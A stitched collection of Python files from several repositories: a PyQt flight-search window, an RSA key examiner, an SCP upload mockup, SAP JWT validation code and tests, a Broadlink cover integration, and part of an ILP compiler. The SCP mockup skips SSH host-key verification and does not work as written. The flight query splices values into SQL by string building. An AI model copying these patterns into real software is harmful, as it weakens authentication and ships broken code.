# print(query_destination.value(0))
query_flight = QSqlQuery() # 新建QSqlQuery对象
query_flight.prepare('SELECT 航班编号 FROM 航班 '
'WHERE 航班.出发机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :departure) '
'and 航班.到达机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :destination)') # 输入SQL语句
query_flight.bindValue(":departure", self.comboBox_departure.currentText())
query_flight.bindValue(":destination", self.comboBox_destination.currentText()) #绑定占位符和相应的功能
query_flight.exec_() # 执行
flight = "("
while query_flight.next():
flight += "'" + query_flight.value(0) + "'"
if query_flight.next():
flight += ","
query_flight.previous()
flight += ")" # flight : (A, B, ....)
self.model = QSqlTableModel() # 新建SQLTableModel 对象
self.output_search.setModel(self.model) # 绑定到tableview对象上
self.model.setTable('飞行计划安排') # 相当于 from 语句
self.model.setFilter("航班编号 in %s" % (flight)) # 相当于where语句
print(self.model.filter())
self.model.select() # 执行SQL select
self.output_search.show() # 显示
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_departure.setText(_translate("MainWindow", "Departure"))
self.comboBox_departure.setCurrentText(_translate("MainWindow", "北京"))
self.comboBox_departure.setItemText(0, _translate("MainWindow", "北京"))
self.comboBox_departure.setItemText(1, _translate("MainWindow", "成都"))
self.comboBox_departure.setItemText(2, _translate("MainWindow", "香港"))
self.comboBox_departure.setItemText(3, _translate("MainWindow", "哈尔滨"))
self.comboBox_departure.setItemText(4, _translate("MainWindow", "海南"))
self.comboBox_departure.setItemText(5, _translate("MainWindow", "上海"))
self.comboBox_departure.setItemText(6, _translate("MainWindow", "长春"))
self.comboBox_departure.setItemText(7, _translate("MainWindow", "兰州"))
self.comboBox_departure.setItemText(8, _translate("MainWindow", "广州"))
self.comboBox_departure.setItemText(9, _translate("MainWindow", "长沙"))
self.comboBox_departure.setItemText(10, _translate("MainWindow", "南昌"))
self.label_destination.setText(_translate("MainWindow", "Destination"))
self.comboBox_destination.setItemText(0, _translate("MainWindow", "北京"))
self.comboBox_destination.setItemText(1, _translate("MainWindow", "成都"))
self.comboBox_destination.setItemText(2, _translate("MainWindow", "香港"))
self.comboBox_destination.setItemText(3, _translate("MainWindow", "哈尔滨"))
self.comboBox_destination.setItemText(4, _translate("MainWindow", "海南"))
self.comboBox_destination.setItemText(5, _translate("MainWindow", "上海"))
self.comboBox_destination.setItemText(6, _translate("MainWindow", "长春"))
self.comboBox_destination.setItemText(7, _translate("MainWindow", "兰州"))
self.comboBox_destination.setItemText(8, _translate("MainWindow", "广州"))
self.comboBox_destination.setItemText(9, _translate("MainWindow", "长沙"))
self.comboBox_destination.setItemText(10, _translate("MainWindow", "南昌"))
self.label_date.setText(_translate("MainWindow", "DATE"))
self.label_class.setText(_translate("MainWindow", "Class"))
self.comboBox_class.setItemText(0, _translate("MainWindow", "头等舱"))
self.comboBox_class.setItemText(1, _translate("MainWindow", "商务舱"))
self.comboBox_class.setItemText(2, _translate("MainWindow", "经济舱"))
self.Search.setText(_translate("MainWindow", "Search"))
self.menu.setTitle(_translate("MainWindow", "注册"))
self.menu_2.setTitle(_translate("MainWindow", "功能"))
self.menu_3.setTitle(_translate("MainWindow", "用户"))
self.menu_4.setTitle(_translate("MainWindow", "管理员"))
self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar"))
self.toolBar_2.setWindowTitle(_translate("MainWindow", "toolBar_2"))
self.toolBar_3.setWindowTitle(_translate("MainWindow", "toolBar_3"))
self.actionregister.setText(_translate("MainWindow", "用户注册"))
self.actionbuy.setText(_translate("MainWindow", "机票购买"))
self.action1.setText(_translate("MainWindow", "机票购买"))
self.actionds.setText(_translate("MainWindow", "我的机票"))
self.actionkj.setText(_translate("MainWindow", "添加数据"))
``` |
{
"source": "519seven/cs627",
"score": 4
} |
#### File: 519seven/cs627/examine_rsa.py
```python
Input: private key in pkcs1 or 8 format
Output: decimal representations of key data
HEX if --hex is passed in '''
import argparse
import sys
from Crypto.PublicKey import RSA
def get_args():
''' Build argument object '''
parser = argparse.ArgumentParser(
description='RSA key examiner'
)
parser.add_argument(
'-k',
'--key',
help='Specify the location of your RSA key',
required=True
)
parser.add_argument(
'-p',
'--passphrase',
help='Supply your key passphrase',
default=None
)
parser.add_argument(
'--hex',
dest='hex',
help='Output in HEX? (default is decimal)',
action='store_true'
)
return parser.parse_args()
if __name__ == '__main__':
args = get_args()
passphrase = args.passphrase
public_key = RSA.importKey(open(args.key, 'r').read(), passphrase)
if args.hex:
print(f"n: {hex(public_key.n)}")
print(f"e: {hex(public_key.e)}")
print(f"d: {hex(public_key.d)}")
print(f"p: {hex(public_key.p)}")
print(f"u: {hex(public_key.u)}")
sys.exit(0)
print(f"n: {public_key.n}")
print(f"e: {public_key.e}")
print(f"d: {public_key.d}")
print(f"p: {public_key.p}")
print(f"u: {public_key.u}")
sys.exit(0)
``` |
{
"source": "519seven/python_snippets",
"score": 2
} |
#### File: 519seven/python_snippets/scptoweb-climockup.py
```python
from paramiko import RSAKey
from paramiko import SSHClient
from paramiko import SSHException
from paramiko import AutoAddPolicy
from scp import SCPClient # https://pypi.org/project/scp/
import logging
import logging.handlers
import os
import sys
import syslog
import json, os
import shlex
import subprocess as subp
syslog.openlog("scptoweb")
def check_env_vars():
i = 5
for param in ['WEBSERVER', 'PORT', 'FILESDIR', 'SCPUSER', 'PKEY', 'KNOWNHOSTS']:
try:
os.environ[param]
except KeyError:
print("{0} env var must be set prior to calling this script".format(param))
sys.exit(i)
i += 1
def load_env_vars():
source = 'source ./env_vars.sh'
dump = '/usr/bin/env python3 -c "import os, json; print json.dumps(dict(os.environ))"'
command = shlex.split(f"/bin/bash -c {source} && {dump}")
proc = subp.Popen(command, stdout=subp.PIPE)
env = json.loads(proc.stdout.read())
os.environ = env
print(env)
def ssh_connect():
syslog.syslog(syslog.LOG_ALERT, "Starting scptoweb ...")
rsakey = RSAKey.from_private_key_file(f"/Users/{SCPUSER}/.ssh/rsa_id")
ssh = SSHClient()
ssh.load_system_host_keys(filename=KNOWNHOSTS)
ssh.set_missing_host_key_policy(AutoAddPolicy())
syslog.syslog(syslog.LOG_ALERT, 'Connecting to {0} ...'.format(WEBSERVER))
ssh.connect(WEBSERVER, port=PORT, username=SCPUSER, pkey=rsakey, auth_timeout=22)
def scan_and_upload(ssh_conn):
with SCPClient(ssh_conn.get_transport()) as scp:
print('Scanning {0} ...'.format(FILESDIR))
for filename in os.scandir(FILESDIR):
if str(filename).endswith(".pdf") or str(filename).endswith(".doc") or str(filename).endswith(".docx"):
scp.put(filename.path, remote_path='Site_Files')
scp.close()
## Loading the environment
def main():
''' Load env vars, connect, scan and upload '''
load_env_vars()
check_env_vars()
WEBSERVER = os.environ['WEBSERVER']
PORT = os.environ['PORT']
FILESDIR = os.environ['FILESDIR']
SCPUSER = os.environ['SCPUSER']
PKEY = os.environ['PKEY']
KNOWNHOSTS = os.environ['KNOWNHOSTS']
ssh_conn = ssh_connect()
scan_and_upload(ssh_conn)
if __name__ == "__main__":
main()
``` |
{
"source": "51acorsi/cloud-pysec",
"score": 2
} |
#### File: sap/xssec/__init__.py
```python
from typing import Dict
from sap.xssec.security_context_ias import SecurityContextIAS
from sap.xssec.security_context_xsuaa import SecurityContextXSUAA
def create_security_context_xsuaa(token, service_credentials: Dict[str, str]):
"""
Creates the XSUAA Security Context by validating the received access token.
:param token: string containing the access_token
:param service_credentials: dict containing the uaa/ias credentials
:return: SecurityContextXSUAA object
"""
return SecurityContextXSUAA(token, service_credentials)
def create_security_context_ias(token, service_credentials: Dict[str, str]):
"""
Creates the IAS Security Context by validating the received access token.
:param token: string containing the access_token
:param service_credentials: dict containing the uaa/ias credentials
:return: SecurityContextIAS object
"""
return SecurityContextIAS(token, service_credentials)
create_security_context = create_security_context_xsuaa
```
#### File: sap/xssec/security_context_ias.py
```python
import logging
from typing import List, Dict
from urllib3.util import Url, parse_url # type: ignore
from sap.xssec.jwt_audience_validator import JwtAudienceValidator
from sap.xssec.jwt_validation_facade import JwtValidationFacade, DecodeError
from sap.xssec.key_cache import KeyCache
from sap.xssec.key_cache_v2 import get_verification_key_ias
class SecurityContextIAS(object):
""" SecurityContextIAS class """
verificationKeyCache = KeyCache()
def __init__(self, token: str, service_credentials: Dict[str, str]):
self.token = token
self.service_credentials = service_credentials
self.logger = logging.getLogger(__name__)
self.jwt_validator = JwtValidationFacade()
self.audience_validator = JwtAudienceValidator(self.service_credentials["clientid"])
try:
self.token_payload = self.jwt_validator.decode(token, False)
self.token_header = self.jwt_validator.get_unverified_header(token)
self.validate_issuer().validate_timestamp().validate_audience().validate_signature()
except DecodeError:
raise ValueError("Failed to decode provided token")
def get_issuer(self):
return self.token_payload.get("ias_iss") or self.token_payload["iss"]
def validate_issuer(self):
"""
check `ias_iss` or `iss` in jwt token
"""
issuer_url: Url = parse_url(self.get_issuer())
if issuer_url.scheme != "https":
raise ValueError("Token's issuer has wrong protocol ({})".format(issuer_url.scheme))
if issuer_url.query is not None:
raise ValueError("Token's issuer has unallowed query value ({})".format(issuer_url.query))
if issuer_url.fragment is not None:
raise ValueError("Token's issuer has unallowed hash value ({})".format(issuer_url.fragment))
domains: List[str] = self.service_credentials.get("domains") or (
[self.service_credentials["domain"]] if "domain" in self.service_credentials else [])
if not any(map(lambda d: issuer_url.host.endswith(d), domains)):
raise ValueError("Token's issuer is not found in domain list {}".format(", ".join(domains)))
return self
def validate_timestamp(self):
"""
check `exp` in jwt token
"""
if self.jwt_validator.has_token_expired(self.token):
raise ValueError("Token has expired")
return self
def validate_audience(self):
"""
check `aud` in jwt token
"""
validation_result = self.audience_validator.validate_token(audiences_from_token=self.token_payload["aud"])
if validation_result is False:
raise RuntimeError('Audience Validation Failed')
return self
def validate_signature(self):
"""
check signature in jwt token
"""
verification_key: str = get_verification_key_ias(
self.get_issuer(), self.token_payload.get("zone_uuid"), self.token_header["kid"])
result_code = self.jwt_validator.loadPEM(verification_key)
if result_code != 0:
raise RuntimeError('Invalid verification key, result code {0}'.format(result_code))
self.jwt_validator.checkToken(self.token)
error_description = self.jwt_validator.getErrorDescription()
if error_description != '':
raise RuntimeError(
'Error in validation of access token: {0}, result code {1}'.format(
error_description, self.jwt_validator.getErrorRC()))
return self
```
#### File: tests/ias/ias_tokens.py
```python
from tests.jwt_tools import sign
def merge(dict1, dict2):
result = dict1.copy()
result.update(dict2)
return result
HEADER = {
"alg": "RS256",
"kid": "kid-custom"
}
PAYLOAD = {
"sub": "<EMAIL>",
"iss": "https://tenant.accounts400.ondemand.com",
"groups": "CONFIGURED_GROUP",
"given_name": "Vorname",
"aud": [
"clientid"
],
"user_uuid": "db60e49c-1fb7-4a15-9a9e-8ababf856fe9",
"azp": "70af88d4-0371-4374-b4f5-f24f650bfac5",
"zone_uuid": "4b0c2b7a-1279-4352-a68d-a9a228a4f1e9",
"iat": 1470815434,
"exp": 2101535434,
"family_name": "Nachname",
"jti": "b23fa11e-3455-49f4-b0c3-a141e648e6ae",
"email": "<EMAIL>"
}
VALID_TOKEN = sign(PAYLOAD, headers=HEADER)
VALID_TOKEN_WITH_CUSTOM_DOMAIN = sign(merge(PAYLOAD, {
"ias_iss": "https://tenant.accounts400.ondemand.com",
"iss": "https://tenant.custom.domain.com",
}), headers=HEADER)
TOKEN_INVALID_ISSUER = sign(merge(PAYLOAD, {
"iss": "https://wrong-domain",
}), headers=HEADER)
TOKEN_INVALID_AUDIENCE = sign(merge(PAYLOAD, {
"aud": ["wrong-client"],
}), headers=HEADER)
TOKEN_EXPIRED = sign(merge(PAYLOAD, {
"exp": 1470815434,
}), headers=HEADER)
```
#### File: cloud-pysec/tests/test_req_token.py
```python
import asyncio
import unittest
from unittest.mock import patch
from os import environ, path, devnull
import socket
from time import sleep
from subprocess import Popen
from sap.xssec import jwt_validation_facade, constants
from sap import xssec
from tests import uaa_configs
from tests import jwt_payloads
from tests.jwt_tools import sign
import requests
from tests.keys import CLIENT_X509_CERTIFICATE, CLIENT_X509_KEY
TEST_SERVER_POLL_ATTEMPTS = 10
def get_free_tcp_port():
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.bind(('', 0))
_, port = tcp.getsockname()
tcp.close()
return port
flask_env = environ.copy()
flask_env['FLASK_APP'] = path.join(path.dirname(
path.abspath(__file__)), 'utils', 'uaa_mock.py')
flask_port = str(get_free_tcp_port())
flask_url = 'http://localhost:' + flask_port
# Event loop for running async functions in tests
loop = asyncio.get_event_loop()
class ReqTokenForClientTest(unittest.TestCase):
DEVNULL = None
flask_process = None
@classmethod
def setUpClass(cls):
""" Test class static setup """
environ["SAP_EXT_JWT_ALG"] = "*"
cls.DEVNULL = open(devnull, 'w')
cls.flask_process = Popen(['flask', 'run', '-p', flask_port, '-h', 'localhost'],
env=flask_env, stdout=cls.DEVNULL, stderr=cls.DEVNULL)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
poll = 0
while poll != TEST_SERVER_POLL_ATTEMPTS:
try:
sleep(1)
poll += 1
s.connect(('localhost', int(flask_port)))
print('Test server is up!') # pylint: disable=superfluous-parens
break
except socket.error as e:
if poll == TEST_SERVER_POLL_ATTEMPTS:
print(
'Test server could not start!') # pylint: disable=superfluous-parens
raise e
s.close()
jwt_validation_facade.ALGORITHMS = ['RS256', 'HS256']
@classmethod
def tearDownClass(cls):
if cls.flask_process:
cls.flask_process.terminate()
if cls.DEVNULL:
cls.DEVNULL.close()
def _request_token_for_client_error(self, sec_context, url, error_message_end):
service_credentials = {
'clientid': 'clientid',
'clientsecret': 'clientsecret',
'url': url
}
with self.assertRaises(RuntimeError) as ctx:
sec_context.request_token_for_client(service_credentials, None)
self.assertTrue(str(ctx.exception).endswith(error_message_end))
def _setup_get_error(self, mock):
mock.side_effect = requests.exceptions.SSLError
def _req_client_service_credentials(self):
service_credentials = {
'clientid': 'clientid',
'clientsecret': 'clientsecret',
'url': flask_url + '/correct'
}
return service_credentials
def _req_client_sec_context(self):
sec_context = xssec.create_security_context(
sign(jwt_payloads.USER_TOKEN_JWT_BEARER_FOR_CLIENT), uaa_configs.VALID['uaa'])
return sec_context
@patch('httpx.get')
def test_req_client_for_user_401_error(self, mock_get):
self._setup_get_error(mock_get)
sec_context = xssec.create_security_context(
sign(jwt_payloads.USER_TOKEN_JWT_BEARER_FOR_CLIENT), uaa_configs.VALID['uaa'])
sec_context = self._req_client_sec_context()
expected_message = \
'Authorization header invalid, requesting client does'\
' not have grant_type={} or no scopes were granted.'.format(constants.GRANTTYPE_JWT_BEARER)
self._request_token_for_client_error(
sec_context, flask_url + '/401', expected_message)
@patch('httpx.get')
def test_req_client_for_user_500_error(self, mock_get):
self._setup_get_error(mock_get)
sec_context = self._req_client_sec_context()
self._request_token_for_client_error(
sec_context, flask_url + '/500', 'HTTP status code: 500')
@patch('httpx.get')
def test_req_client_for_user(self, mock_get):
self._setup_get_error(mock_get)
sec_context = self._req_client_sec_context()
service_credentials = self._req_client_service_credentials()
token = sec_context.request_token_for_client(service_credentials, None)
self.assertEqual(token, 'access_token')
@patch('httpx.get')
def test_req_client_for_user_with_mtls(self, mock_get):
self._setup_get_error(mock_get)
sec_context = xssec.create_security_context(
sign(jwt_payloads.USER_TOKEN_JWT_BEARER_FOR_CLIENT), uaa_configs.VALID['uaa'])
service_credentials = {
'clientid': 'clientid',
'certificate': CLIENT_X509_CERTIFICATE,
'key': CLIENT_X509_KEY,
'certurl': flask_url + '/mtls'
}
token = sec_context.request_token_for_client(service_credentials, None)
@patch('httpx.get')
def test_req_client_for_user_async(self, mock_get):
self._setup_get_error(mock_get)
sec_context = self._req_client_sec_context()
service_credentials = self._req_client_service_credentials()
coro = sec_context.request_token_for_client_async(service_credentials)
token = loop.run_until_complete(coro)
self.assertEqual(token, 'access_token')
``` |
{
"source": "51acorsi/homeassistant-broadlink-cover",
"score": 2
} |
#### File: homeassistant-broadlink-cover/cover/broadlink.py
```python
from datetime import timedelta
from base64 import b64encode, b64decode
import asyncio
import binascii
import logging
import socket
import voluptuous as vol
from homeassistant.util.dt import utcnow
from homeassistant.util import Throttle
from homeassistant.components.cover import (CoverDevice, PLATFORM_SCHEMA, SUPPORT_OPEN, SUPPORT_CLOSE, SUPPORT_STOP)
from homeassistant.const import (
CONF_FRIENDLY_NAME, CONF_COMMAND_OPEN,
CONF_COMMAND_CLOSE, CONF_COMMAND_STOP,
CONF_COVERS, CONF_TIMEOUT,
CONF_HOST, CONF_MAC)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['broadlink==0.9.0']
_LOGGER = logging.getLogger(__name__)
TIME_BETWEEN_UPDATES = timedelta(seconds=5)
DOMAIN = 'broadlink'
DEFAULT_NAME = 'Broadlink cover'
DEFAULT_TIMEOUT = 10
DEFAULT_RETRY = 3
COVER_SCHEMA = vol.Schema({
vol.Optional(CONF_COMMAND_OPEN, default=None): cv.string,
vol.Optional(CONF_COMMAND_CLOSE, default=None): cv.string,
vol.Optional(CONF_COMMAND_STOP, default=None): cv.string,
vol.Optional(CONF_FRIENDLY_NAME): cv.string,
})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_COVERS, default={}):
vol.Schema({cv.slug: COVER_SCHEMA}),
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_MAC): cv.string,
vol.Optional(CONF_FRIENDLY_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up Broadlink covers."""
import broadlink
devices = config.get(CONF_COVERS)
ip_addr = config.get(CONF_HOST)
friendly_name = config.get(CONF_FRIENDLY_NAME)
mac_addr = binascii.unhexlify(
config.get(CONF_MAC).encode().replace(b':', b''))
broadlink_device = broadlink.rm((ip_addr, 80), mac_addr, None)
covers = []
for object_id, device_config in devices.items():
covers.append(
BroadlinkRMCover(
device_config.get(CONF_FRIENDLY_NAME, object_id),
broadlink_device,
device_config.get(CONF_COMMAND_OPEN),
device_config.get(CONF_COMMAND_CLOSE),
device_config.get(CONF_COMMAND_STOP)
)
)
broadlink_device.timeout = config.get(CONF_TIMEOUT)
try:
broadlink_device.auth()
except socket.timeout:
_LOGGER.error("Failed to connect to device")
add_devices(covers)
class BroadlinkRMCover(CoverDevice):
"""Representation of an Broadlink cover."""
def __init__(self, friendly_name, device, command_open, command_close, command_stop):
"""Initialize the cover."""
self._name = friendly_name
self._state = False
self._command_open = b64decode(command_open) if command_open else None
self._command_close = b64decode(command_close) if command_close else None
self._command_stop = b64decode(command_stop) if command_stop else None
self._device = device
@property
def name(self):
"""Return the name of the cover."""
return self._name
@property
def assumed_state(self):
"""Return true if unable to access real state of entity."""
return True
@property
def should_poll(self):
"""Return the polling state."""
return False
@property
def is_closed(self):
"""Return true if device is closed."""
return self._state
@property
def supported_features(self):
support_features = 0
if self._command_open is not None:
support_features |= SUPPORT_OPEN
if self._command_close is not None:
support_features |= SUPPORT_CLOSE
if self._command_stop is not None:
support_features |= SUPPORT_STOP
return support_features
def open_cover(self, **kwargs):
"""Open the cover."""
self._sendpacket(self._command_open)
def close_cover(self, **kwargs):
"""Close the cover."""
self._sendpacket(self._command_close)
def stop_cover(self, **kwargs):
"""Stop the cover."""
self._sendpacket(self._command_stop)
def _sendpacket(self, packet, retry=2):
"""Send packet to device."""
if packet is None:
_LOGGER.debug("Empty packet")
return True
try:
self._device.send_data(packet)
except (socket.timeout, ValueError) as error:
if retry < 1:
_LOGGER.error(error)
return False
if not self._auth():
return False
return self._sendpacket(packet, retry-1)
return True
def _auth(self, retry=2):
try:
auth = self._device.auth()
except socket.timeout:
auth = False
if not auth and retry > 0:
return self._auth(retry-1)
return auth
``` |
{
"source": "51alg/TerpreT",
"score": 2
} |
#### File: TerpreT/bin/compile_ilp.py
```python
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "lib"))
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "lib", 'ilp'))
from docopt import docopt
import traceback
import pdb
import ast
import astunparse
import tptv1
import utils as u
import os
import unroller
import astunparse
import imp
from ilp_utils import LPWriter, CaseNode, SwitchGroup, Declaration, Constant
from lp2matrix import LPCompiler
lpw = LPWriter()
def ensure_dir(f):
d = os.path.dirname(f)
if not os.path.exists(d):
os.makedirs(d)
def make_matlab_filename(filename):
return filename.replace("_", "").replace(".py", ".m")
def parse_set_to(expr_node):
assert isinstance(expr_node, ast.Expr), "set_to node should be Expr"
call_node = u.cast(expr_node.value, ast.Call)
attribute_node = u.cast(call_node.func, ast.Attribute)
name_node = u.cast(attribute_node.value, ast.Name)
lhs_var = name_node.id
possible_attributes = ["set_to", "set_to_constant", "observe_value", "set_message"]
assert attribute_node.attr in possible_attributes, "unexpected attribute " + ast.dump(attribute_node)
op, args = u.parse_factor_expression(call_node.args[0])
if attribute_node.attr == "set_to_constant":
assert op is None, "set_to_constant isn't a constant"
op = "SetToConstant"
elif attribute_node.attr == "set_to":
if op is None:
op = "Copy"
elif attribute_node.attr == "observe_value":
assert op is None, "observe_value isn't a constant"
op = "ObserveValue"
return lhs_var, [op] + args
class Factor(object):
def __init__(self, expr_node, case_node):
self.var_name, factor = parse_set_to(expr_node)
self.f = factor[0]
self.arg_names = factor[1:]
self.context = case_node
def resolve_variables(self):
self.decl = self.context.resolve_variable(self.var_name)
self.args = []
for arg_name in self.arg_names:
if isinstance(arg_name, int):
self.args.append(arg_name)
else:
arg = self.context.resolve_variable(arg_name)
self.args.append(arg)
def is_observation(self):
return self.f == "ObserveValue"
def is_constant(self):
return self.f == "SetToConstant"
def __repr__(self):
return "%s.set_to(%s(%s, %s))" % (self.var_name, self.f, self.arg_names,
self.context.context_str())
def scope(self):
all_vars = [self.decl] + self.args
return filter(lambda x: isinstance(x, Declaration), all_vars)
def scope_names(self):
return [decl.var for decl in self.scope()]
# return [self.var_name] + self.arg_names
def local_marginal(self):
scope_str = ",".join([decl.name for decl in self.scope()])
return "%s_<%s>" % (scope_str, self.context.context_str())
def make_switch_group(if_node, parent_case):
cases_ast = u.if_and_or_else_blocks(if_node)
switch_group = SwitchGroup(None, parent_case.num_switch_groups())
switch_group.set_parent_case(parent_case)
switch_group.var_name = None
for if_node in cases_ast:
compare_node = u.cast(if_node.test, ast.Compare)
var_name, val = u.parse_compare(compare_node)
if switch_group.var_name is None:
switch_group.var_name = var_name
else:
assert var_name == switch_group.var_name, "if blocks must switch on same var"
case_node = make_case_node(if_node.body, var_name, val)
switch_group.add_case(val, case_node)
return switch_group
def make_case_node(body, var_name, val):
case_node = CaseNode(var_name, val)
for ch in body:
if isinstance(ch, ast.If):
switch_group = make_switch_group(ch, case_node)
case_node.add_switch_group(switch_group)
elif isinstance(ch, ast.Assign):
if u.is_constant_definition(ch):
const = Constant(ch, case_node)
case_node.add_constant(const)
else:
decl = Declaration(ch, case_node)
case_node.add_declaration(decl)
elif (isinstance(ch, ast.FunctionDef) and
filter(lambda x: x.func.id=='Runtime',ch.decorator_list)):
case_node.add_runtime_function(ch)
elif isinstance(ch, ast.Expr):
factor = Factor(ch, case_node)
case_node.add_factor(factor)
else:
case_node.unhandled.append(ch)
# print "unhandled", ast.dump(ch)
return case_node
def print_switch_block_tree(body, level=0):
if isinstance(body, list):
for node in body:
if isinstance(node, SwitchGroup):
print level*4*" ", "// start group %s#%s" % (node.var_name, node.idx())
print_switch_block_tree(node.cases.values(), level=level)
print level*4*" ", "// end group %s#%s" % (node.var_name, node.idx())
elif isinstance(node, CaseNode):
print level*4*" ", "%s=%s:" % (node.var_name, node.val)
print_switch_block_tree(node.declarations, level=level+1)
print_switch_block_tree(node.factors, level=level+1)
print_switch_block_tree(node.switch_groups, level=level+1)
else:
print level*4*" ", node
else:
assert False
def decls_in_case_node(case_node):
results = case_node.declarations + []
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
results.extend(decls_in_case_node(child_case_node))
return results
def active_vars(case_node):
factors = case_node.factors + []
decls = set([])
for factor in factors:
for decl in factor.scope():
decls.add(decl)
decls |= set(case_node.declarations)
for switch_group in case_node.switch_groups:
decls.add(case_node.resolve_variable(switch_group.var_name))
for child_case_node in switch_group.cases.values():
decls |= active_vars(child_case_node)
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
decls -= set(child_case_node.declarations)
return decls
def declare_local_marginals(case_node):
vars = active_vars(case_node)
#local_marginals = case_node.make_local_marginals(vars)
case_node.make_local_marginals(vars)
#for var_name in local_marginals:
# marg_name = local_marginals[var_name]
# lpw.add_variable(marg_name, case_node.resolve_variable(var_name).size)
for var in vars:
kind = var.kind if case_node.context_str() == '' else 'Var'
lpw.add_variable(case_node.to_local_marginal(var), var.size, kind)
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
declare_local_marginals(child_case_node)
def factors_in_case_node(case_node):
factors = case_node.factors + []
for factor in factors:
factor.resolve_variables()
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
factors.extend(factors_in_case_node(child_case_node))
return factors
def used_vars_in_case_node(case_node):
factors = case_node.factors + []
vars = set([])
for factor in factors:
for var in factor.scope():
vars.add(var)
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
vars |= used_vars_in_case_node(child_case_node)
return vars
def make_cross_level_constraints(case_node):
parent_mus = case_node.local_marginals
for switch_group in case_node.switch_groups:
for var in parent_mus:
children_mus = []
unused_vals = []
for child_case_node in switch_group.cases.values():
child_mus = child_case_node.local_marginals
if var in child_mus:
children_mus.append(child_mus[var])
else:
unused_vals.append(child_case_node.val)
if len(children_mus) > 0:
if len(unused_vals) > 0:
# Var is used in some children but not all. Need to handle unused cases.
# get gate marginal in parent context
switch_marg = case_node.get_local_marginal(switch_group.var_name)
# create ghost marginal
ghost_marginal = switch_group.ghost_local_marginal(var)
lpw.add_variable(ghost_marginal, case_node.resolve_variable(var).size)
children_mus.append(ghost_marginal)
entries = [
("+1", ghost_marginal, var),
("-1", switch_marg, "%s=[%s]" % (switch_group.var_name,
",".join([str(s + lpw.zero_one_index_offset())
for s in unused_vals])))
]
lpw.add_equality(entries, "0", n_eq=1)
# make cross-level consistency constraints
entries = [
("+1", parent_mus[var], "")
]
for child_mu in children_mus:
entries.append(("-1", child_mu, ""))
sz = case_node.resolve_variable(var).size
target = "np.zeros((%s))" % sz
lpw.add_equality(entries, target, n_eq=case_node.eval_constant(sz))
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
make_cross_level_constraints(child_case_node)
def make_total_probability_constraints(case_node):
if case_node.is_global_case():
target_marginal = 1
for decl in case_node.declarations:
entries = [("+1", case_node.get_local_marginal(decl.name), decl.name)]
target = "1"
lpw.add_equality(entries, target, n_eq=1)
else:
target_marginal, target_value = case_node.gate_value_local_marginal_and_value()
target_value = case_node.eval_constant(target_value)
for var_name in case_node.local_marginals: #case_node.declarations:
decl = case_node.resolve_variable(var_name)
entries = [
("+1", case_node.local_marginals[decl.name], decl.name),
("-1", target_marginal, "%s=%s" % (case_node.var_name,
target_value + lpw.zero_one_index_offset()))
]
target = "0"
lpw.add_equality(entries, target, n_eq=1)
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
make_total_probability_constraints(child_case_node)
def declare_factor_local_marginals(case_node):
for factor in case_node.factors:
if factor.is_observation(): continue
if factor.is_constant(): continue
if len(factor.scope()) <= 1: continue
lpw.add_variable(factor.local_marginal(),
",".join([str(decl.size) for decl in factor.scope()]))
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
declare_factor_local_marginals(child_case_node)
def make_local_consistency_constraints(case_node):
for factor in case_node.factors:
if factor.is_observation(): continue
if factor.is_constant(): continue
if len(factor.scope()) <= 1: continue
for decl in factor.scope():
rest_of_scope_vars = [decl2.name for decl2 in factor.scope()]
rest_of_scope_vars = filter(lambda x: x != decl.name, rest_of_scope_vars)
entries = [("+1", factor.local_marginal(), ";".join(rest_of_scope_vars)),
("-1", case_node.local_marginals[decl.name], "")]
target = "np.zeros((%s))" % decl.size
lpw.add_equality(entries, target, n_eq=factor.context.eval_constant(decl.size))
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
make_local_consistency_constraints(child_case_node)
def make_objective(case_node):
for factor in case_node.factors:
term1 = factor.local_marginal() #",".join(factor.scope_names())
if factor.is_observation() or factor.is_constant():
try:
observed_value = int(factor.arg_names[0])
#observed_value += lpw.zero_one_index_offset()
except ValueError:
assert False, "Can only observe integer values for now. Ask DT if you need this (it's easy-ish)."
term2 = "[%s] == %s" % (factor.var_name, observed_value)
else:
term2 = "[%s] == self.rt.%s(%s)" % (factor.var_name, factor.f,
",".join(objective_arg_strings(factor)))#["[%s]" % arg_name for arg_name in factor.arg_names]))
lpw.add_objective(term1, term2)
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
make_objective(child_case_node)
def objective_arg_strings(factor):
obj_arg_strings = []
for arg_name in factor.arg_names:
# should allow named constants here too, ignore this for now
if isinstance(arg_name, basestring):
obj_arg_strings.append("[%s]" % arg_name)
else:
obj_arg_strings.append(str(arg_name))
return obj_arg_strings
def validate_tree(case_node):
for switch_group in case_node.switch_groups:
switch_group.validate()
for child_case_node in switch_group.cases.values():
validate_tree(child_case_node)
def make_mat_file(model_filename):
module_name = os.path.basename(model_filename).replace(".py", "")
module = imp.load_source(module_name, model_filename)
LP = module.makeLP()
LP.save_to_mat([None,model_filename.replace(".py", ".mat")])
def compile_ilp(model_filename, hypers_filename, data_filename,
train_batch, out_dir):
(parsed_model, data, hypers, out_name) = u.read_inputs(model_filename,
hypers_filename,
data_filename,
train_batch)
